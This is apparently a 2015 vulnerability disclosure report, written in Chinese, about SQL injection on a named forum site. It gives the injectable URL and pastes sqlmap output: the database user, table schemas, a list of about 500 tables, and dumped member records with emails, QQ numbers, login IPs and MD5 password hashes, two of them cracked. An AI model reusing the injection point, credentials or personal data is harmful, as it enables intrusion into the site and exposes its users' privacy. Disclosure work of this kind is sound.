2015-08-20: 细节已通知厂商并且等待厂商处理中 2015-08-21: 厂商已经确认,细节仅向厂商公开 2015-08-31: 细节向核心白帽子及相关领域专家公开 2015-09-10: 细节向普通白帽子公开 2015-09-20: 细节向实习白帽子公开 2015-10-05: 细节向公众公开
第四发了 还不给首页??
1.注入点http://bbs.jzq001.com/forum.php?mod=viewthread&tid=465692.用户数量推测,这是我早上注册的42985是我的id,可遍历http://bbs.jzq001.com/space-uid-42985.html3.丢sqlmap跑出数据4.
[16:09:53] [INFO] the back-end DBMS is MySQLweb server operating system: Linux CentOSweb application technology: PHP 5.5.22, Apache 2.2.15back-end DBMS: MySQL 5.0[16:09:53] [INFO] fetching current user[16:09:53] [INFO] resumed: root@localhostcurrent user: 'root@localhost'
5.
| groupid | groups | slog | uid | username |+---------+----------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----+----------+| 3 | <blank> | <blank> | 0 | ???? || 3 | <blank> | 1361190053,183.129.201.251;1361200318,183.129.201.251;1361234648,183.129.201.251;1361237875,183.129.201.251;1361241914,183.129.201.251;1361245544,183.129.201.251;1361346056,183.129.201.251;1361349593,183.129.201.251 | 1 | admin || 4 | ,16,3, | <blank> | 2 | ?? || 4 | ,5,16,3, | 1361190078,220.189.80.247;1361246411,220.189.80.247;1361251211,220.189.80.247;1361254452,220.189.80.247;1361257064,220.189.80.247;1361265227,220.189.80.247;1361282541,220.189.80.247;1361363303,115.229.149.220 | 3 | ??? |+---------+----------+------------------------------------------------------------------------------------------------------------------------------------------
6.
37 columns]+------------+----------------------+| Column | Type |+------------+----------------------+| aliww | varchar(30) || attach | varchar(50) || banpm | text || bday | date || datefm | varchar(15) || email | varchar(60) || gender | tinyint(1) || groupid | tinyint(3) || groups | varchar(255) || hack | varchar(255) || honor | varchar(100) || icon | varchar(255) || icq | varchar(12) || introduce | text || lastaddrst | varchar(255) || location | varchar(36) || medals | varchar(255) || memberid | tinyint(3) || msggroups | varchar(255) || msn | varchar(35) || newpm | smallint(6) unsigned || oicq | varchar(12) || p_num | tinyint(3) unsigned || password | varchar(40) || regdate | int(10) unsigned || safecv | varchar(10) || shortcut | varchar(255) || signature | text || site | varchar(75) || style | varchar(12) || t_num | tinyint(3) unsigned || timedf | varchar(5) || uid | int(10) unsigned || username | varchar(15) || userstatus | int(10) unsigned || yahoo | varchar(35) || yz | int(10) |+------------+----------------------+
7.8个管理员用户密码
Table: pw_members[8 entries]+---------+---------+---------+------------+---------+------------------+--------+---------+----------+------+---------+------------+---------+-----------+------------+----------+---------+----------+-----------+---------+-------+------------+-------+---------------------------------------------+------------+---------+-------------------------------------------+-----------+-----------------------+---------+-------+---------+-----+----------+------------+---------+----+| aliww | attach | banpm | bday | datefm | email | gender | groupid | groups | hack | honor | icon | icq | introduce | lastaddrst | location | medals | memberid | msggroups | msn | newpm | oicq | p_num | password | regdate | safecv | shortcut | signature | site | style | t_num | timedf | uid | username | userstatus | yahoo | yz |+---------+---------+---------+------------+---------+------------------+--------+---------+----------+------+---------+------------+---------+-----------+------------+----------+---------+----------+-----------+---------+-------+------------+-------+---------------------------------------------+------------+---------+-------------------------------------------+-----------+-----------------------+---------+-------+---------+-----+----------+------------+---------+----+| <blank> | <blank> | <blank> | 0000-00-00 | <blank> | <blank> | 0 | 3 | <blank> | 0 | <blank> | 3.jpg|1||| | <blank> | <blank> | <blank> | <blank> | <blank> | 8 | <blank> | <blank> | 4 | 1961767707 | 0 | e10adc3949ba59abbe56e057f20f883e (123456) | 1361172720 | <blank> | ,article,write,diary,share,groups,photos, | <blank> | <blank> | <blank> | 0 | <blank> | 1 | admin | 192 | <blank> | 1 || <blank> | <blank> | <blank> | 1992-01-08 | <blank> | 914333434@qq.com | 1 | 4 | ,16,3, | 0 | ??????? | 2.jpg|1||| | <blank> | ?? | <blank> | ?? | <blank> | 8 | <blank> | <blank> | 0 | 914333434 | 0 | 514b9672f3d6bb9b309e4503f393221e (lovesong) | 1361173200 | <blank> | <blank> | <blank> | http://www.paobug.com | <blank> | 0 | 0 | 2 | ?? | 1152 | <blank> | 1 || <blank> | <blank> | <blank> | 0000-00-00 | <blank> | 568989840@qq.com | 0 | 4 | ,5,16,3, | 0 | <blank> | 7.jpg|1||| | <blank> | <blank> | <blank> | <blank> | <blank> | 8 | <blank> | <blank> | 0 | <blank> | 0 | 9868f6cb073a2f100fc0db88f411d63a | 1361173620 | <blank> | <blank> | <blank> | <blank> | <blank> | 0 | <blank> | 3 | ??? | 1152 | <blank> | 1 || <blank> | <blank> | <blank> | 1990-12-02 | <blank> | 604698240@qq.com | 1 | -1 | <blank> | 0 | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | 8 | <blank> | <blank> | 0 | <blank> | 0 | 3a3a1e7e1a5c60c9c882a69412c4a9ce | 1361174439 | <blank> | <blank> | <blank> | <blank> | <blank> | 0 | 0 | 4 | ?? | 1024 | <blank> | 1 || <blank> | <blank> | <blank> | 0000-00-00 | <blank> | <blank> | 0 | 3 | <blank> | 0 | <blank> | 9.jpg|1||| | <blank> | <blank> | <blank> | <blank> | <blank> | 8 | <blank> | <blank> | 0 | <blank> | 0 | cfe5576c8e87599db8a3242e0f52f50f | 1361174574 | <blank> | <blank> | <blank> | <blank> | <blank> | 0 | <blank> | 5 | ???? | 1024 | <blank> | 1 || <blank> | <blank> | <blank> | 0000-00-00 | <blank> | 506529047@qq.com | 0 | -1 | <blank> | 0 | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | 8 | <blank> | <blank> | 0 | <blank> | 0 | f3cc3fcf8407576b542f1cd5227405ba | 1361174862 | <blank> | <blank> | <blank> | <blank> | <blank> | 0 | <blank> | 6 | ?? | 1024 | <blank> | 1 || <blank> | <blank> | <blank> | 0000-00-00 | <blank> | 447236641@qq.com | 0 | -1 | <blank> | 0 | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | 8 | <blank> | <blank> | 0 | <blank> | 0 | 98724ea1acb790af34bf81c564d3391f | 1361176144 | <blank> | <blank> | <blank> | <blank> | <blank> | 0 | <blank> | 7 | ????? | 1024 | <blank> | 1 || <blank> | <blank> | <blank> | 1990-11-04 | <blank> | lucyuxj@163.com | 2 | -1 | <blank> | 0 | <blank> | <blank> | <blank> | <blank> | <blank> | ?????? | <blank> | 8 | <blank> | <blank> | 1 | <blank> | 0 | a154e4c767243fc465387b59175d40af | 1361187758 | <blank> | <blank> | <blank> | <blank> | <blank> | 0 | 0 | 8 | ?? | 1152 | <blank> | 1 |+---------+---------+---------+------------+---------+------------------+--------+---------+----------+------+---------+------------+---------+-----------+------------+----------+---------+----------+-----------+---------+-------+------------+-------+---------------------------------------------+------------+---------+-------------------------------------------+-----------+-----------------------+---------+-------+---------+-----+----------+------------+---------+----+
8.这里是用户最近最后登入时间,一些学币
--------------+-----------------------+ Column | Type |--------------+-----------------------+ address | varchar(255) | begintime | int(10) unsigned | cid | int(10) unsigned | content | text | createtime | int(10) unsigned | deadline | int(10) unsigned | endtime | int(10) unsigned | hits | int(10) unsigned | id | mediumint(8) unsigned | introduction | varchar(255) | limitnum | tinyint(3) | members | int(10) unsigned | objecter | tinyint(3) | poster | varchar(60) | price | decimal(8,2) | title | varchar(120) | type | tinyint(3) unsigned | uid | int(10) unsigned |--------------+-----------------------+
9.论坛500表 其他的自己慢慢来
[493 tables]+----------------------------------+| bf_common_admincp_cmenu || bf_common_admincp_group || bf_common_admincp_member || bf_common_admincp_perm || bf_common_admincp_session || bf_common_admingroup || bf_common_adminnote || bf_common_advertisement || bf_common_advertisement_custom || bf_common_banned || bf_common_block || bf_common_block_favorite || bf_common_block_item || bf_common_block_item_data || bf_common_block_permission || bf_common_block_pic || bf_common_block_style || bf_common_block_xml || bf_common_cache || bf_common_card || bf_common_card_log || bf_common_card_type || bf_common_connect_guest || bf_common_credit_log || bf_common_credit_rule || bf_common_credit_rule_log || bf_common_credit_rule_log_field || bf_common_cron || bf_common_devicetoken || bf_common_district || bf_common_diy_data || bf_common_domain || bf_common_failedlogin || bf_common_friendlink || bf_common_grouppm || bf_common_invite || bf_common_magic || bf_common_magiclog || bf_common_mailcron || bf_common_mailqueue || bf_common_member || bf_common_member_action_log || bf_common_member_connect || bf_common_member_count || bf_common_member_crime || bf_common_member_field_forum || bf_common_member_field_home || bf_common_member_grouppm || bf_common_member_log || bf_common_member_magic || bf_common_member_medal || bf_common_member_profile || bf_common_member_profile_setting || bf_common_member_security || bf_common_member_stat_field || bf_common_member_status || bf_common_member_validate || bf_common_member_verify || bf_common_member_verify_info || bf_common_myapp || bf_common_myinvite || bf_common_mytask || bf_common_nav || bf_common_onlinetime || bf_common_patch || bf_common_plugin || bf_common_pluginvar || bf_common_process || bf_common_regip || bf_common_relatedlink || bf_common_report || bf_common_searchindex || bf_common_secquestion || bf_common_session || bf_common_setting || bf_common_smiley || bf_common_sphinxcounter || bf_common_stat || bf_common_statuser || bf_common_style || bf_common_stylevar || bf_common_syscache || bf_common_tag || bf_common_tagitem || bf_common_task || bf_common_taskvar || bf_common_template || bf_common_template_block || bf_common_template_permission || bf_common_uin_black || bf_common_usergroup || bf_common_usergroup_field || bf_common_word || bf_common_word_type || bf_connect_disktask || bf_connect_feedlog || bf_connect_memberbindlog || bf_connect_postfeedlog || bf_connect_tthreadlog || bf_forum_access || bf_forum_activity || bf_forum_activityapply || bf_forum_announcement || bf_forum_attachment || bf_forum_attachment_0 || bf_forum_attachment_1 || bf_forum_attachment_2 || bf_forum_attachment_3 || bf_forum_attachment_4 || bf_forum_attachment_5 || bf_forum_attachment_6 || bf_forum_attachment_7 || bf_forum_attachment_8 || bf_forum_attachment_9 || bf_forum_attachment_exif || bf_forum_attachment_unused || bf_forum_attachtype || bf_forum_bbcode || bf_forum_collection || bf_forum_collectioncomment || bf_forum_collectionfollow || bf_forum_collectioninvite || bf_forum_collectionrelated || bf_forum_collectionteamworker || bf_forum_collectionthread || bf_forum_creditslog || bf_forum_debate || bf_forum_debatepost || bf_forum_faq || bf_forum_forum || bf_forum_forum_threadtable || bf_forum_forumfield || bf_forum_forumrecommend || bf_forum_groupcreditslog || bf_forum_groupfield || bf_forum_groupinvite || bf_forum_grouplevel || bf_forum_groupuser || bf_forum_imagetype || bf_forum_medal || bf_forum_medallog || bf_forum_memberrecommend || bf_forum_moderator || bf_forum_modwork || bf_forum_onlinelist || bf_forum_order || bf_forum_poll || bf_forum_polloption || bf_forum_pollvoter || bf_forum_post || bf_forum_post_location || bf_forum_post_moderate || bf_forum_post_tableid || bf_forum_postcache || bf_forum_postcomment || bf_forum_postlog || bf_forum_poststick || bf_forum_promotion || bf_forum_ratelog || bf_forum_relatedthread || bf_forum_replycredit || bf_forum_rsscache || bf_forum_spacecache || bf_forum_statlog || bf_forum_thread || bf_forum_thread_moderate || bf_forum_threadaddviews || bf_forum_threadclass || bf_forum_threadclosed || bf_forum_threaddisablepos || bf_forum_threadimage || bf_forum_threadlog || bf_forum_threadmod || bf_forum_threadpartake || bf_forum_threadpreview || bf_forum_threadrush || bf_forum_threadtype || bf_forum_trade || bf_forum_tradecomment || bf_forum_tradelog || bf_forum_typeoption || bf_forum_typeoptionvar || bf_forum_typevar || bf_forum_warning || bf_home_album || bf_home_album_category || bf_home_appcreditlog || bf_home_blacklist || bf_home_blog || bf_home_blog_category || bf_home_blog_moderate || bf_home_blogfield || bf_home_class || bf_home_click || bf_home_clickuser || bf_home_comment || bf_home_comment_moderate || bf_home_docomment || bf_home_doing || bf_home_doing_moderate || bf_home_favorite || bf_home_feed || bf_home_feed_app || bf_home_follow || bf_home_follow_feed || bf_home_follow_feed_archiver || bf_home_friend || bf_home_friend_request || bf_home_friendlog || bf_home_notification || bf_home_pic || bf_home_pic_moderate || bf_home_picfield || bf_home_poke || bf_home_pokearchive || bf_home_share || bf_home_share_moderate || bf_home_show || bf_home_specialuser || bf_home_userapp || bf_home_userappfield || bf_home_visitor || bf_mobile_setting || bf_portal_article_content || bf_portal_article_count || bf_portal_article_moderate || bf_portal_article_related || bf_portal_article_title || bf_portal_article_trash || bf_portal_attachment || bf_portal_category || bf_portal_category_permission || bf_portal_comment || bf_portal_comment_moderate || bf_portal_rsscache || bf_portal_topic || bf_portal_topic_pic || bf_security_evilpost || bf_security_eviluser || bf_security_failedlog || bf_ucenter_admins || bf_ucenter_applications || bf_ucenter_badwords || bf_ucenter_domains || bf_ucenter_failedlogins || bf_ucenter_feeds || bf_ucenter_friends || bf_ucenter_mailqueue || bf_ucenter_memberfields || bf_ucenter_members || bf_ucenter_mergemembers || bf_ucenter_newpm || bf_ucenter_notelist || bf_ucenter_pm_indexes || bf_ucenter_pm_lists || bf_ucenter_pm_members || bf_ucenter_pm_messages_0 || bf_ucenter_pm_messages_1 || bf_ucenter_pm_messages_2 || bf_ucenter_pm_messages_3 || bf_ucenter_pm_messages_4 || bf_ucenter_pm_messages_5 || bf_ucenter_pm_messages_6 || bf_ucenter_pm_messages_7 || bf_ucenter_pm_messages_8 || bf_ucenter_pm_messages_9 || bf_ucenter_protectedmembers || bf_ucenter_settings || bf_ucenter_sqlcache || bf_ucenter_tags || bf_ucenter_vars || pw_actattachs || pw_actions || pw_active || pw_activity || pw_activitycate || pw_activitydefaultvalue || pw_activityfield || pw_activitymembers || pw_activitymodel || pw_activitypaylog || pw_activityvalue1 || pw_activityvalue10 || pw_activityvalue11 || pw_activityvalue12 || pw_activityvalue13 || pw_activityvalue14 || pw_activityvalue15 || pw_activityvalue16 || pw_activityvalue17 || pw_activityvalue2 || pw_activityvalue3 || pw_activityvalue4 || pw_activityvalue5 || pw_activityvalue6 || pw_activityvalue7 || pw_activityvalue8 || pw_activityvalue9 || pw_actmember || pw_actmembers || pw_administrators || pw_adminlog || pw_adminset || pw_advert || pw_announce || pw_area_level || pw_argument || pw_attachbuy || pw_attachdownload || pw_attachs || pw_attention || pw_attention_blacklist || pw_ban || pw_banuser || pw_bbsinfo || pw_buyadvert || pw_cache || pw_cache_members || pw_cachedata || pw_channel || pw_clientorder || pw_cmembers || pw_cms_article || pw_cms_articlecontent || pw_cms_articleextend || pw_cms_attach || pw_cms_column || pw_cms_purview || pw_cnalbum || pw_cnclass || pw_cnlevel || pw_cnphoto || pw_cnskin || pw_cnstyles || pw_collection || pw_collectiontype || pw_colonys || pw_comment || pw_config || pw_creditlog || pw_credits || pw_customfield || pw_cwritedata || pw_datanalyse || pw_datastate || pw_datastore || pw_debatedata || pw_debates || pw_delta_diarys || pw_delta_members || pw_delta_posts || pw_delta_threads || pw_diary || pw_diarytype || pw_draft || pw_elements || pw_extragroups || pw_favors || pw_feed || pw_filter || pw_filter_class || pw_filter_dictionary || pw_focus || pw_forumdata || pw_forumlog || pw_forummsg || pw_forums || pw_forumsell || pw_forumsextra || pw_friends || pw_friendtype || pw_group_replay || pw_hack || pw_help || pw_invitecode || pw_inviterecord || pw_invoke || pw_invokepiece || pw_ipstates || pw_job || pw_jober || pw_log_colonys || pw_log_diary || pw_log_members || pw_log_posts || pw_log_threads || pw_medalinfo || pw_medalslogs || pw_medaluser || pw_membercredit || pw_memberdata || pw_memberinfo || pw_members || pw_memo || pw_modehot || pw_ms_attachs || pw_ms_configs || pw_ms_messages || pw_ms_relations || pw_ms_replies || pw_ms_searchs || pw_ms_tasks || pw_nav || pw_oboard || pw_online || pw_ouserdata || pw_overprint || pw_owritedata || pw_pagecache || pw_pageinvoke || pw_pcfield || pw_pcmember || pw_pcvalue1 || pw_permission || pw_pidtmp || pw_pinglog || 马赛克 马赛克 || |马赛克 马赛克 马赛克 马赛克 马赛克 马赛克 +----------------------------------+
到此为止
还有第8步的管理密码
求首页 求高分
危害等级:高
漏洞Rank:15
确认时间:2015-08-21 16:23
thanks
暂无
